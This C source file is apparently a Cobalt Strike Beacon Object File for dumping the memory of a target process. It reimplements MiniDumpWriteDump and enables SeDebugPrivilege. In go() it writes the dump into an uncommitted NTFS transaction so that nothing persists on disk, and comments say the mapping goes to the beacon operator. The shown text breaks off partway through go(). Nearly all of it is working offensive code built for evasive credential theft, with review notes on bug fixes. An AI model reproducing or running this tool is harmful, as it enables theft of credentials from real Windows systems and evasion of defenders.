failed: 176 | KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pcs_buffer); 177 | return FALSE; 178 | } 179 | 180 | static void writeat(struct dump_context* dc, RVA rva, const void* data, unsigned size) 181 | { 182 | DWORD written; 183 | 184 | KERNEL32$SetFilePointer(dc->hFile, rva, NULL, FILE_BEGIN); 185 | KERNEL32$WriteFile(dc->hFile, data, size, &written, NULL); 186 | } 187 | 188 | static void append(struct dump_context* dc, const void* data, unsigned size) 189 | { 190 | writeat(dc, dc->rva, data, size); 191 | dc->rva += size; 192 | } 193 | 194 | static unsigned dump_system_info(struct dump_context* dc) 195 | { 196 | MINIDUMP_SYSTEM_INFO mdSysInfo; 197 | SYSTEM_INFO sysInfo; 198 | OSVERSIONINFOW osInfo; 199 | DWORD written; 200 | ULONG slen; 201 | DWORD wine_extra = 0; 202 | 203 | const char* build_id = NULL; 204 | const char* sys_name = NULL; 205 | const char* release_name = NULL; 206 | 207 | KERNEL32$GetSystemInfo(&sysInfo); 208 | osInfo.dwOSVersionInfoSize = sizeof(osInfo); 209 | 210 | typedef int(WINAPI* RtlGetNtVersionNumbers)(PDWORD, PDWORD, PDWORD); 211 | 212 | HINSTANCE hinst = LoadLibrary("ntdll.dll"); 213 | DWORD dwMajor, dwMinor, dwBuildNumber; 214 | RtlGetNtVersionNumbers proc = (RtlGetNtVersionNumbers)GetProcAddress(hinst, "RtlGetNtVersionNumbers"); 215 | proc(&dwMajor, &dwMinor, &dwBuildNumber); 216 | dwBuildNumber &= 0xffff; 217 | BeaconPrintf(CALLBACK_OUTPUT, "[+] OS Version: %d.%d.%d\n", dwMajor, dwMinor, dwBuildNumber); 218 | FreeLibrary(hinst); 219 | 220 | mdSysInfo.ProcessorArchitecture = sysInfo.wProcessorArchitecture; 221 | mdSysInfo.ProcessorLevel = sysInfo.wProcessorLevel; 222 | mdSysInfo.ProcessorRevision = sysInfo.wProcessorRevision; 223 | mdSysInfo.NumberOfProcessors = (UCHAR)sysInfo.dwNumberOfProcessors; 224 | mdSysInfo.ProductType = VER_NT_WORKSTATION; /* This might need fixing */ 225 | mdSysInfo.MajorVersion = dwMajor; 226 | mdSysInfo.MinorVersion = dwMinor; 227 | mdSysInfo.BuildNumber = dwBuildNumber; 228 | mdSysInfo.PlatformId = 
0x2; 229 | 230 | mdSysInfo.CSDVersionRva = dc->rva + sizeof(mdSysInfo) + wine_extra; 231 | mdSysInfo.Reserved1 = 0; 232 | mdSysInfo.SuiteMask = VER_SUITE_TERMINAL; 233 | 234 | unsigned i; 235 | ULONG64 one = 1; 236 | 237 | mdSysInfo.Cpu.OtherCpuInfo.ProcessorFeatures[0] = 0; 238 | mdSysInfo.Cpu.OtherCpuInfo.ProcessorFeatures[1] = 0; 239 | 240 | for (i = 0; i < sizeof(mdSysInfo.Cpu.OtherCpuInfo.ProcessorFeatures[0]) * 8; i++) 241 | if (KERNEL32$IsProcessorFeaturePresent(i)) 242 | mdSysInfo.Cpu.OtherCpuInfo.ProcessorFeatures[0] |= one << i; 243 | 244 | append(dc, &mdSysInfo, sizeof(mdSysInfo)); 245 | 246 | const WCHAR* szCSDVersion = L""; 247 | slen = KERNEL32$lstrlenW(szCSDVersion) * sizeof(WCHAR); 248 | KERNEL32$WriteFile(dc->hFile, &slen, sizeof(slen), &written, NULL); 249 | KERNEL32$WriteFile(dc->hFile, szCSDVersion, slen, &written, NULL); 250 | dc->rva += sizeof(ULONG) + slen; 251 | 252 | return sizeof(mdSysInfo); 253 | } 254 | 255 | void minidump_add_memory_block(struct dump_context* dc, ULONG64 base, ULONG size, ULONG rva) 256 | { 257 | if (!dc->mem) 258 | { 259 | dc->alloc_mem = 32; 260 | dc->mem = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), 0, dc->alloc_mem * sizeof(*dc->mem)); 261 | } 262 | else if (dc->num_mem >= dc->alloc_mem) 263 | { 264 | dc->alloc_mem *= 2; 265 | dc->mem = KERNEL32$HeapReAlloc(KERNEL32$GetProcessHeap(), 0, dc->mem, 266 | dc->alloc_mem * sizeof(*dc->mem)); 267 | } 268 | if (dc->mem) 269 | { 270 | dc->mem[dc->num_mem].base = base; 271 | dc->mem[dc->num_mem].size = size; 272 | dc->mem[dc->num_mem].rva = rva; 273 | dc->num_mem++; 274 | } 275 | else dc->num_mem = dc->alloc_mem = 0; 276 | } 277 | 278 | 279 | static void minidump_add_memory64_block(struct dump_context* dc, ULONG64 base, ULONG64 size) 280 | { 281 | if (!dc->mem64) 282 | { 283 | dc->alloc_mem64 = 32; 284 | dc->mem64 = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), 0, dc->alloc_mem64 * sizeof(*dc->mem64)); 285 | } 286 | else if (dc->num_mem64 >= dc->alloc_mem64) 287 | { 288 | 
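/* Growth path of minidump_add_memory64_block (the function's opening lines sit
 * just above this span). Reallocate through a temporary so a failed HeapReAlloc
 * neither leaks the current array nor discards the regions already recorded;
 * on failure only this region is dropped. */
        void* grown = KERNEL32$HeapReAlloc(KERNEL32$GetProcessHeap(), 0, dc->mem64,
                                           (dc->alloc_mem64 * 2) * sizeof(*dc->mem64));
        if (!grown)
            return;
        dc->mem64 = grown;
        dc->alloc_mem64 *= 2;
    }
    if (dc->mem64)
    {
        dc->mem64[dc->num_mem64].base = base;
        dc->mem64[dc->num_mem64].size = size;
        dc->num_mem64++;
    }
    else dc->num_mem64 = dc->alloc_mem64 = 0;
}

/*
 * Walk the target's address space with VirtualQueryEx and record every
 * MEM_COMMIT region as a 64-bit memory descriptor. Protection is not
 * inspected, so PAGE_NOACCESS / PAGE_GUARD regions are listed as well; their
 * reads fail later and dump_memory64_info emits zeros for them.
 *
 * The walk stops when VirtualQueryEx fails (end of the address space) or when
 * advancing past the current region would wrap around.
 */
static void fetch_memory64_info(struct dump_context* dc)
{
    MEMORY_BASIC_INFORMATION mbi;
    ULONG_PTR addr = 0;

    while (KERNEL32$VirtualQueryEx(dc->handle, (LPCVOID)addr, &mbi, sizeof(mbi)) != 0)
    {
        if (mbi.State == MEM_COMMIT)
            minidump_add_memory64_block(dc, (ULONG_PTR)mbi.BaseAddress, mbi.RegionSize);

        /* wrap-around guard: the next base would not be representable */
        if ((addr + mbi.RegionSize) < addr)
            break;

        addr = (ULONG_PTR)mbi.BaseAddress + mbi.RegionSize;
    }
}

/*
 * Copy `size` bytes at `addr` in `process` into `buf` through the
 * NtReadVirtualMemory stub. Succeeds only for a complete read: a non-zero
 * status or a short byte count is reported as failure, so the caller never
 * treats a half-filled buffer as valid dump data.
 */
static inline BOOL read_process_memory(HANDLE process, UINT64 addr, void* buf, size_t size)
{
    SIZE_T got = 0;
    NTSTATUS res = NtReadVirtualMemory(process, (PVOID)(ULONG_PTR)addr, buf, size, &got);
    return res == 0 && got == size;
}

/*
 * Write the Memory64ListStream: a range count, the RVA where the raw bytes
 * begin, one MINIDUMP_MEMORY_DESCRIPTOR64 (base, size) per region, and then
 * the regions' contents back to back at the end of the file.
 *
 * The descriptors carry no per-region file offset: region i's bytes sit at
 * BaseRva plus the sizes of regions 0..i-1, which is exactly how filepos is
 * advanced below. Every region must therefore occupy DataSize bytes in the
 * file. A chunk that cannot be read (guard page, region released after it
 * was enumerated) is written as zeros instead of being skipped; skipping it
 * (the previous behaviour) shifted the rest of that region backwards and left
 * its tail unwritten, corrupting what a parser reads for that range.
 *
 * Returns the size of the stream header written at dc->rva. WriteFile errors
 * are not checked here; the transacted file is local and a failure would
 * surface as a truncated dump on the operator side.
 */
static unsigned dump_memory64_info(struct dump_context* dc)
{
    MINIDUMP_MEMORY64_LIST mdMem64List;
    MINIDUMP_MEMORY_DESCRIPTOR64 mdMem64;
    DWORD written;
    unsigned i, len, sz;
    RVA rva_base;
    char tmp[1024];
    ULONG64 pos;
    LARGE_INTEGER filepos;

    sz = sizeof(mdMem64List.NumberOfMemoryRanges) +
         sizeof(mdMem64List.BaseRva) +
         dc->num_mem64 * sizeof(mdMem64);

    mdMem64List.NumberOfMemoryRanges = dc->num_mem64;
    mdMem64List.BaseRva = dc->rva + sz;

    append(dc, &mdMem64List.NumberOfMemoryRanges, sizeof(mdMem64List.NumberOfMemoryRanges));
    append(dc, &mdMem64List.BaseRva, sizeof(mdMem64List.BaseRva));

    /* reserve the descriptor table; entries are patched in with writeat() below */
    rva_base = dc->rva;
    dc->rva += dc->num_mem64 * sizeof(mdMem64);

    /* dc->rva is not advanced past this point: the raw memory is the tail of the dump */
    filepos.QuadPart = dc->rva;
    for (i = 0; i < dc->num_mem64; i++)
    {
        mdMem64.StartOfMemoryRange = dc->mem64[i].base;
        mdMem64.DataSize = dc->mem64[i].size;

        KERNEL32$SetFilePointerEx(dc->hFile, filepos, NULL, FILE_BEGIN);
        for (pos = 0; pos < dc->mem64[i].size; pos += sizeof(tmp))
        {
            len = (unsigned)(min(dc->mem64[i].size - pos, sizeof(tmp)));
            if (!read_process_memory(dc->handle, dc->mem64[i].base + pos, tmp, len))
                MSVCRT$memset(tmp, 0, len);     /* keep the file offsets honest, see above */
            KERNEL32$WriteFile(dc->hFile, tmp, len, &written, NULL);
        }
        filepos.QuadPart += mdMem64.DataSize;

        writeat(dc, rva_base + i * sizeof(mdMem64), &mdMem64, sizeof(mdMem64));
    }

    return sz;
}

/*
 * Fill `ffi` with the fixed version block of the module at `filename`, or
 * zeros if it cannot be obtained. This opens the module's image on disk
 * through the version API, i.e. file-system activity beyond reading the
 * target process.
 */
static void fetch_module_versioninfo(LPCWSTR filename, VS_FIXEDFILEINFO* ffi)
{
    DWORD handle;
    DWORD sz;
    static const WCHAR backslashW[] = { '\\', '\0' };

    MSVCRT$memset(ffi, 0, sizeof(*ffi));

    sz = VERSION$GetFileVersionInfoSizeW(filename, &handle);
    if (sz == 0)
        return;

    void* info = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), 0, sz);
    if (!info)
        return;

    if (VERSION$GetFileVersionInfoW(filename, handle, sz, info))
    {
        VS_FIXEDFILEINFO* ptr;
        UINT len;

        /* the root block ("\") is copied as the fixed info, clamped to ffi's size */
        if (VERSION$VerQueryValueW(info, backslashW, (LPVOID*)&ptr, &len))
            MSVCRT$memcpy(ffi, ptr, min(len, sizeof(*ffi)));
    }
    KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, info);
}

/*
 * Write the ModuleListStream: a module count followed by one MINIDUMP_MODULE
 * per module of the requested kind (dump_elf selects the is_elf entries; the
 * PE enumeration in this file only ever adds is_elf == FALSE). Each module's
 * path is appended as a MINIDUMP_STRING after the table and referenced by RVA.
 *
 * The string is staged in a 1024-byte stack buffer and the copy is bounded by
 * that buffer, so an over-long or unterminated entry in dc->modules cannot run
 * past it (the previous lstrcpyW had no bound).
 *
 * Returns the size of the table (count + entries); the strings written after
 * it are accounted for through dc->rva by append().
 */
static unsigned dump_modules(struct dump_context* dc, BOOL dump_elf)
{
    MINIDUMP_MODULE mdModule;
    MINIDUMP_MODULE_LIST mdModuleList;
    char tmp[1024];
    MINIDUMP_STRING* ms = (MINIDUMP_STRING*)tmp;
    const unsigned max_name_chars = (sizeof(tmp) - sizeof(ULONG)) / sizeof(WCHAR) - 1;
    ULONG i, nmod;
    RVA rva_base;
    DWORD flags_out;
    unsigned sz;

    /* count the entries that will be emitted so the table can be reserved first */
    for (i = nmod = 0; i < dc->num_modules; i++)
    {
        if (!dc->modules[i].is_elf == !dump_elf)
            nmod++;
    }

    mdModuleList.NumberOfModules = 0;
    rva_base = dc->rva;
    sz = sizeof(mdModuleList.NumberOfModules) + sizeof(mdModule) * nmod;
    dc->rva += sz;

    for (i = 0; i < dc->num_modules; i++)
    {
        unsigned name_chars;

        if (!dc->modules[i].is_elf != !dump_elf)
            continue;

        flags_out = ModuleWriteModule | ModuleWriteMiscRecord | ModuleWriteCvRecord;
        if (dc->type & MiniDumpWithDataSegs)
            flags_out |= ModuleWriteDataSeg;
        if (dc->type & MiniDumpWithProcessThreadData)
            flags_out |= ModuleWriteTlsData;
        if (dc->type & MiniDumpWithCodeSegs)
            flags_out |= ModuleWriteCodeSegs;

        /* stage the name as a MINIDUMP_STRING: ULONG byte length (excluding the
         * terminator) followed by the NUL-terminated UTF-16 text */
        name_chars = KERNEL32$lstrlenW(dc->modules[i].name);
        if (name_chars > max_name_chars)
            name_chars = max_name_chars;
        MSVCRT$memcpy(ms->Buffer, dc->modules[i].name, name_chars * sizeof(WCHAR));
        ms->Buffer[name_chars] = L'\0';
        ms->Length = name_chars * sizeof(WCHAR);

        if (flags_out & ModuleWriteModule)      /* always set above; kept for parity with the flag scheme */
        {
            mdModule.BaseOfImage = dc->modules[i].base;
            mdModule.SizeOfImage = dc->modules[i].size;
            mdModule.CheckSum = dc->modules[i].checksum;
            mdModule.TimeDateStamp = dc->modules[i].timestamp;
            mdModule.ModuleNameRva = dc->rva;
            append(dc, ms, sizeof(ULONG) + ms->Length + sizeof(WCHAR));
            fetch_module_versioninfo(ms->Buffer, &mdModule.VersionInfo);
            mdModule.CvRecord.DataSize = 0;
            mdModule.CvRecord.Rva = 0;
            mdModule.MiscRecord.DataSize = 0;
            mdModule.MiscRecord.Rva = 0;
            mdModule.Reserved0 = 0;
            mdModule.Reserved1 = 0;
            writeat(dc,
                    rva_base + sizeof(mdModuleList.NumberOfModules) +
                    mdModuleList.NumberOfModules++ * sizeof(mdModule),
                    &mdModule, sizeof(mdModule));
        }
    }
    writeat(dc, rva_base, &mdModuleList.NumberOfModules, sizeof(mdModuleList.NumberOfModules));

    return sz;
}

/*
 * Reject addresses that cannot be represented in a 32-bit build. In a 64-bit
 * build sizeof(void*) != sizeof(int), so the condition is constant-false and
 * the branch is presumably dropped by the compiler — which would also explain
 * why the un-prefixed SetLastError here has never needed an import. A 32-bit
 * BOF build would have to resolve it (KERNEL32$SetLastError) first.
 */
BOOL validate_addr64(DWORD64 addr)
{
    if (sizeof(void*) == sizeof(int) && (addr >> 32))
    {
        SetLastError(ERROR_INVALID_PARAMETER);
        return FALSE;
    }
    return TRUE;
}

/*
 * Read the DOS and NT headers of the image at `base` in `hProc` into `nth`.
 * Returns TRUE only when both reads succeed and both signatures match.
 *
 * The second read is skipped when the first one failed or the DOS signature
 * is wrong: previously dos.e_lfanew was used even when `dos` had never been
 * filled in. A negative e_lfanew would point before the image and is
 * rejected as well.
 */
BOOL pe_load_nt_header(HANDLE hProc, DWORD64 base, IMAGE_NT_HEADERS* nth)
{
    IMAGE_DOS_HEADER dos;

    if (NtReadVirtualMemory(hProc, (PVOID)(DWORD_PTR)base, &dos, sizeof(dos), NULL) != 0)
        return FALSE;
    if (dos.e_magic != IMAGE_DOS_SIGNATURE || dos.e_lfanew < 0)
        return FALSE;

    if (NtReadVirtualMemory(hProc, (PVOID)(DWORD_PTR)(base + dos.e_lfanew), nth, sizeof(*nth), NULL) != 0)
        return FALSE;

    return nth->Signature == IMAGE_NT_SIGNATURE;
}

/*
 * Append a module record to dc->modules, growing the array on demand (through
 * a temporary, so a failed HeapReAlloc keeps the existing entries). Returns
 * FALSE only when no storage could be obtained.
 *
 * The name slot lives in HeapAlloc'd memory that is never zeroed, so it has to
 * be written on every path: the path PSAPI resolves through the target handle
 * is preferred, the `name` the enumerator passed in (previously ignored) is the
 * fallback, and the array is always NUL-terminated so the lstrlenW in
 * dump_modules stays inside it. Before this change a failed
 * GetModuleFileNameExW left uninitialised heap bytes in the slot.
 */
static BOOL add_module(struct dump_context* dc, const WCHAR* name,
                       DWORD64 base, DWORD size, DWORD timestamp, DWORD checksum,
                       BOOL is_elf)
{
    if (!dc->modules)
    {
        dc->alloc_modules = 32;
        dc->num_modules = 0;
        dc->modules = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), 0,
                                         dc->alloc_modules * sizeof(*dc->modules));
        if (!dc->modules)
        {
            dc->alloc_modules = 0;
            return FALSE;
        }
    }
    else if (dc->num_modules >= dc->alloc_modules)
    {
        void* grown = KERNEL32$HeapReAlloc(KERNEL32$GetProcessHeap(), 0, dc->modules,
                                           (dc->alloc_modules * 2) * sizeof(*dc->modules));
        if (!grown)
            return FALSE;
        dc->modules = grown;
        dc->alloc_modules *= 2;
    }

    {
        WCHAR* dst = dc->modules[dc->num_modules].name;
        const DWORD cap = ARRAY_SIZE(dc->modules[dc->num_modules].name);
        DWORD got = PSAPI$GetModuleFileNameExW(dc->handle, (HMODULE)(DWORD_PTR)base, dst, cap);

        if (got == 0)
        {
            DWORD n = 0;
            if (name)
            {
                while (name[n] != L'\0' && n + 1 < cap)
                {
                    dst[n] = name[n];
                    n++;
                }
            }
            dst[n] = L'\0';
        }
        /* a truncated result is not guaranteed to be terminated */
        dst[cap - 1] = L'\0';
    }

    dc->modules[dc->num_modules].base = base;
    dc->modules[dc->num_modules].size = size;
    dc->modules[dc->num_modules].timestamp = timestamp;
    dc->modules[dc->num_modules].checksum = checksum;
    dc->modules[dc->num_modules].is_elf = is_elf;
    dc->num_modules++;

    return TRUE;
}


/*
 * EnumerateLoadedModulesW64 callback: read the module's NT header out of the
 * target and record it. Returns TRUE to keep enumerating even when a single
 * module cannot be parsed; only an invalid base aborts the walk.
 */
static BOOL WINAPI fetch_pe_module_info_cb(PCWSTR name, DWORD64 base, ULONG size,
                                           PVOID user)
{
    struct dump_context* dc = user;
    IMAGE_NT_HEADERS nth;

    if (!validate_addr64(base))
        return FALSE;

    if (pe_load_nt_header(dc->handle, base, &nth))
        add_module(dc, name, base, size,
                   nth.FileHeader.TimeDateStamp, nth.OptionalHeader.CheckSum,
                   FALSE);

    return TRUE;
}


/* Enumerate the target's loaded modules through dbghelp (a DFR import, so
 * dbghelp.dll is loaded into the beacon process for this). */
static void fetch_modules_info(struct dump_context* dc)
{
    DBGHELP$EnumerateLoadedModulesW64(dc->handle, fetch_pe_module_info_cb, dc);
}

/*
 * Write a full-memory minidump of hProcess into hFile. The layout produced is
 * header, a four-entry stream directory, SystemInfoStream, ModuleListStream,
 * Memory64ListStream and an UnusedStream filler; the raw memory follows as the
 * tail of the file.
 *
 * pid is stored in the context but not otherwise used here. Returns FALSE
 * when SymInitialize or fetch_process_info fails — the symbol handler is now
 * cleaned up on that path too — and TRUE once all streams have been written.
 *
 * The function body continues below this span.
 */
BOOL MiniDumpWriteDumpA(HANDLE hProcess, DWORD pid, HANDLE hFile)
{
    static const MINIDUMP_DIRECTORY emptyDir = { UnusedStream, {0, 0} };
    MINIDUMP_HEADER mdHead;
    MINIDUMP_DIRECTORY mdDir;
    DWORD i, nStreams, idx_stream;
    struct dump_context dc;
    BOOL sym_initialized = FALSE;

    const DWORD Flags = MiniDumpWithFullMemory |
                        MiniDumpWithFullMemoryInfo |
                        MiniDumpWithUnloadedModules;

    MINIDUMP_TYPE DumpType = (MINIDUMP_TYPE)Flags;

    sym_initialized = DBGHELP$SymInitializeW(hProcess, NULL, TRUE);
    if (!sym_initialized)
        return FALSE;

    dc.hFile = hFile;
    dc.pid = pid;
    dc.handle = hProcess;
    dc.modules = NULL;
    dc.num_modules = 0;
    dc.alloc_modules = 0;
    dc.threads = NULL;
    dc.num_threads = 0;
    dc.type = DumpType;
    dc.mem = NULL;
    dc.num_mem = 0;
    dc.alloc_mem = 0;
    dc.mem64 = NULL;
    dc.num_mem64 = 0;
    dc.alloc_mem64 = 0;
    dc.rva = 0;

    if (!fetch_process_info(&dc))
    {
        DBGHELP$SymCleanup(hProcess);   /* was leaked on this path before */
        return FALSE;
    }

    fetch_modules_info(&dc);

    /* directory entries come in groups of four; the unused ones are filled
     * with UnusedStream at the end */
    nStreams = 3;
    nStreams = (nStreams + 3) & ~3;

    // Write Header
    mdHead.Signature = MINIDUMP_SIGNATURE;
    mdHead.Version = MINIDUMP_VERSION;
    mdHead.NumberOfStreams = nStreams;
    mdHead.CheckSum = 0;
    mdHead.StreamDirectoryRva = sizeof(mdHead);
    mdHead.TimeDateStamp = 0;       /* previously left uninitialised: stack bytes went into the dump */
    mdHead.Flags = DumpType;
    append(&dc, &mdHead, sizeof(mdHead));
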
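/* MiniDumpWriteDumpA, continued: stream directory and streams. The header was
 * appended just above this span and dc.rva now points past it. */
    // Write Stream Directories
    dc.rva += nStreams * sizeof(mdDir);
    idx_stream = 0;

    // Write Data Stream Directories
    //

    // Must be first in MiniDump
    mdDir.StreamType = SystemInfoStream;
    mdDir.Location.Rva = dc.rva;
    mdDir.Location.DataSize = dump_system_info(&dc);
    writeat(&dc, mdHead.StreamDirectoryRva + idx_stream++ * sizeof(mdDir),
            &mdDir, sizeof(mdDir));

    mdDir.StreamType = ModuleListStream;
    mdDir.Location.Rva = dc.rva;
    mdDir.Location.DataSize = dump_modules(&dc, FALSE);
    writeat(&dc, mdHead.StreamDirectoryRva + idx_stream++ * sizeof(mdDir),
            &mdDir, sizeof(mdDir));

    // the region list is collected right before the stream that writes it
    fetch_memory64_info(&dc);

    mdDir.StreamType = Memory64ListStream;
    mdDir.Location.Rva = dc.rva;
    mdDir.Location.DataSize = dump_memory64_info(&dc);
    writeat(&dc, mdHead.StreamDirectoryRva + idx_stream++ * sizeof(mdDir),
            &mdDir, sizeof(mdDir));

    // fill the remaining directory entries with 0's (unused stream types)
    // NOTE: this should always come last in the dump!
    for (i = idx_stream; i < nStreams; i++)
        writeat(&dc, mdHead.StreamDirectoryRva + i * sizeof(emptyDir), &emptyDir, sizeof(emptyDir));

    if (sym_initialized)
        DBGHELP$SymCleanup(hProcess);

    KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, dc.mem);
    KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, dc.mem64);
    KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, dc.modules);
    KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, dc.threads);

    return TRUE;
}

/*
 * Enable SeDebugPrivilege in the beacon's own token so NtOpenProcess can reach
 * protected processes. Failures are reported through BeaconPrintf and the
 * function returns early. Previously a failed NtOpenProcessToken fell through
 * and adjusted an unset handle, and a failed LookupPrivilegeValueW closed the
 * token and then still adjusted it.
 *
 * Any NtAdjustPrivilegesToken status other than STATUS_SUCCESS — including the
 * STATUS_NOT_ALL_ASSIGNED (0x106) warning returned when the token does not
 * hold the privilege at all — is reported as "Failed to adjust process token".
 * The caller continues regardless, so a later NtOpenProcess failure is the
 * visible symptom of a missing privilege.
 */
void EnableDebugPriv()
{
    HANDLE hToken = NULL;
    TOKEN_PRIVILEGES tkp;
    LPCWSTR lpwPriv = L"SeDebugPrivilege";
    NTSTATUS status;

    status = NtOpenProcessToken(NtCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken);
    if (status != STATUS_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "Failed to open process token\n");
        return;
    }

    tkp.PrivilegeCount = 1;
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    if (!ADVAPI32$LookupPrivilegeValueW(NULL, lpwPriv, &tkp.Privileges[0].Luid)) {
        BeaconPrintf(CALLBACK_ERROR, "Failed to look up SeDebugPrivilege\n");
        NtClose(hToken);
        return;
    }

    status = NtAdjustPrivilegesToken(hToken, FALSE, &tkp, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
    if (status != STATUS_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "Failed to adjust process token");
    }

    NtClose(hToken);
}

/*
 * Open `dwPid` with PROCESS_QUERY_INFORMATION | PROCESS_VM_READ through the
 * NtOpenProcess stub. Returns the handle, or NULL on failure. Both the status
 * and the out-parameter are checked, so a non-success status is never mistaken
 * for an open handle.
 *
 * NOTE(review): go() below opens the target itself with the same access mask
 * rather than calling this helper.
 */
HANDLE GetProcessHandle(DWORD dwPid) {

    NTSTATUS status;
    HANDLE hProcess = NULL;
    OBJECT_ATTRIBUTES ObjectAttributes;
    CLIENT_ID uPid = { 0 };

    InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL);
    uPid.UniqueProcess = (HANDLE)(DWORD_PTR)dwPid;
    uPid.UniqueThread = (HANDLE)0;

    status = NtOpenProcess(&hProcess, PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, &ObjectAttributes, &uPid);
    if (status != STATUS_SUCCESS || hProcess == NULL) {
        return NULL;
    }

    return hProcess;
}
/*End MiniDumpWriteDump reactOS Code*/

//Entry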
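/* Entry Function
 *
 * go(): BOF entry point run by beacon_inline_execute.
 *
 * Argument buffer (see the .cna): an int PID, then optionally a NUL-terminated
 * output base name followed by its length. With only a PID packed,
 * BeaconDataExtract returns NULL and the PID becomes the base name.
 *
 * Flow: enable SeDebugPrivilege, open the target for PROCESS_QUERY_INFORMATION |
 * PROCESS_VM_READ, create a transaction and a file inside it, write the
 * minidump into that file, map it read-only, hand the mapping to
 * downloadFile(), then release everything. The transaction is never committed,
 * which is what keeps the dump from persisting on disk.
 *
 * Changes vs the previous version:
 *  - the MiniDump result was tested with `if (success = 0)` (an assignment),
 *    so a failed dump was reported as success and an empty/partial file mapped;
 *  - the download-name buffer was sized outputFileLength + 9, one byte short
 *    of "mem:\" + name + ".dmp" + NUL — a one-byte heap overflow;
 *  - every early exit left the process, transaction, file and section handles
 *    open in the beacon for its lifetime, and an NtCreateFile failure left the
 *    thread's current transaction set; all exits now share one cleanup path;
 *  - the dump size is printed with a 64-bit conversion instead of %d.
 */
void go(char* args, int length) {

    //Beacon parser stuff
    datap parser;
    DWORD PID;
    char* outputFile;
    int outputFileLength;

    //Declare variables
    void* returnData = NULL;
    HANDLE hProc = NULL;
    HANDLE hFile = NULL;
    HANDLE tFile = NULL;
    HANDLE mapFile = NULL;
    BOOL success = FALSE;
    BOOL txSet = FALSE;             /* TRUE while tFile is this thread's current transaction */
    NTSTATUS status = 0;
    SIZE_T ViewSize = 0;
    OBJECT_ATTRIBUTES objAttr;
    CLIENT_ID cID;
    IO_STATUS_BLOCK IoStatusBlock;
    UNICODE_STRING unicodeString;
    LARGE_INTEGER largeInteger;
    LARGE_INTEGER fs;
    unsigned long long fileSize = 0;
    char fileName[1024];            /* "mem:\" + base name + ".dmp", bounded below */
    int fileNameLength = 0;
    PCWSTR filePath = L"\\??\\C:\\SomeBogusFile.txt";

    BeaconDataParse(&parser, args, length);
    PID = BeaconDataInt(&parser);
    outputFile = BeaconDataExtract(&parser, NULL);
    outputFileLength = BeaconDataInt(&parser);

    InitializeObjectAttributes(&objAttr, NULL, 0, NULL, NULL);
    cID.UniqueProcess = (PVOID)(ULONG_PTR)PID;
    cID.UniqueThread = 0;

    //Get pointer to RtlSetCurrentTransaction and RtlInitUnicodeString
    _RtlSetCurrentTransaction RtlSetCurrentTransaction = (_RtlSetCurrentTransaction) GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlSetCurrentTransaction");
    _RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString) GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlInitUnicodeString");
    if (!RtlSetCurrentTransaction || !RtlInitUnicodeString) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to resolve RtlSetCurrentTransaction/RtlInitUnicodeString from ntdll\n");
        return;
    }

    //Enable Debug Privs (best effort: EnableDebugPriv reports its own failures)
    BeaconPrintf(CALLBACK_OUTPUT, "[+] Attempting To Enable Debug Privs\n");
    EnableDebugPriv();

    //Open target process and if successful attempt to dump memory
    BeaconPrintf(CALLBACK_OUTPUT, "[+] Attempting To Dump Proccess %d\n", PID);
    status = NtOpenProcess(&hProc, PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, &objAttr, &cID);
    if (status != 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] NtOpenProcess failed with status %lx\n", status);
        goto cleanup;
    }
    BeaconPrintf(CALLBACK_OUTPUT, "[+] NtOpenProcess returned HANDLE 0x%p\n", hProc);

    //Create Transaction
    status = NtCreateTransaction(&tFile, TRANSACTION_ALL_ACCESS, &objAttr, NULL, NULL, 0, 0, 0, NULL, NULL);
    if (status != 0) {
        BeaconPrintf(CALLBACK_OUTPUT, "[-] NtCreateTransaction failed with status %lx\n", status);
        goto cleanup;
    }
    BeaconPrintf(CALLBACK_OUTPUT, "[+] NtCreateTransaction returned HANDLE 0x%p\n", tFile);

    //Set Current Transaction (returns a BOOLEAN: 1 on success)
    status = RtlSetCurrentTransaction(tFile);
    if (status != 1) {
        BeaconPrintf(CALLBACK_OUTPUT, "[-] RtlSetCurrentTransaction failed with status %lx\n", status);
        goto cleanup;
    }
    txSet = TRUE;
    BeaconPrintf(CALLBACK_OUTPUT, "[+] RtlSetCurrentTransaction successfully set\n");

    //Set some arbitrary file path; the file only ever exists inside the transaction
    RtlInitUnicodeString(&unicodeString, filePath);
    InitializeObjectAttributes(&objAttr, &unicodeString, OBJ_CASE_INSENSITIVE, NULL, NULL);
    largeInteger.QuadPart = 0;

    //Create File
    status = NtCreateFile(&hFile, FILE_GENERIC_READ | FILE_GENERIC_WRITE | SYNCHRONIZE, &objAttr, &IoStatusBlock, &largeInteger, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_WRITE | FILE_SHARE_READ, FILE_OVERWRITE_IF, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);
    if (status != 0) {
        BeaconPrintf(CALLBACK_OUTPUT, "[-] NtCreateFile failed with status %lx\n", status);
        goto cleanup;
    }
    BeaconPrintf(CALLBACK_OUTPUT, "[+] NtCreateFile returned HANDLE 0x%p\n", hFile);

    //Detach the transaction from the thread again; the file handle stays transacted
    status = RtlSetCurrentTransaction(0);
    if (status != 1) {
        BeaconPrintf(CALLBACK_OUTPUT, "[-] RtlSetCurrentTransaction failed with status %lx\n", status);
        goto cleanup;
    }
    txSet = FALSE;
    BeaconPrintf(CALLBACK_OUTPUT, "[+] RtlSetCurrentTransaction successfully set\n");

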